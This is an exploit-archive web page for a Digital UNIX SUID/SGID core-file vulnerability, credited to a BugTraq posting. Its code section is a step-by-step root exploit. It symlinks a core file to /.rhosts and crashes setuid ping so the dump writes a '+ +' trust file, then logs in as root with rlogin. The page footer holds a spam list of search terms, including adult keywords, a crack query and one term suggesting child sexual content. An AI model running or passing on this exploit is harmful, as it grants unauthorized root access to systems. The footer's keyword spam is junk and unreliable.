about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Digital UNIX SUID/SGID Core File Vulnerability


Title Digital UNIX SUID/SGID Core File Vulnerability
Published 1998-04-06-12:00AM
Updated 1999-06-01-12:00AM
Class Unknown
CVE   CVE-MAP-NOMATCH
Remote  Unknown
Local  Unknown
Credit  Made public by |-ru5ty- and [SoReN] in the BugTraq mailing list.
Vulnerable  Digital UNIX 4.0 D
Digital UNIX 4.0 B
Digital UNIX 4.0
Not Vulnerable  
Code   $ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x 1 root bin 32768 Nov 16 1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
$ kill -11 1337
[1] Segmentation fault /usr/sbin/ping somehost (core dumped)
[2] +Segmentation fault /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw------- 1 root system 385024 Mar 29 05:17 /.rhosts
##/.rhosts has been created....that's all.##
$ rlogin localhost -l root
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 15:24:41 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
efsha.co.u maxcpm.inf t95t sex 98.mov jinrisf.co CMS is Fre www.jinris www.free-z 200+%252Fc mambo+Remo www.candyc WinZip Www.pinkwo freefhqiig www.jinris WWW.SEX SE Xxximage SSH Server Www,sex,co LMS gay tv vid Www usa se candelbox Free vidio www.pondok t549t freeclip? katja kass passive mambo Remo wwworldsex tiffany te vedio clip ICQ 5.1 php 5.2.3 EFS w.w.w.mywa online ved www.jockey www.sexlk www.putas. acunetix online ved Adult sexp crack data Kiddysex.c allhotgirl 041 www, sexyhotfil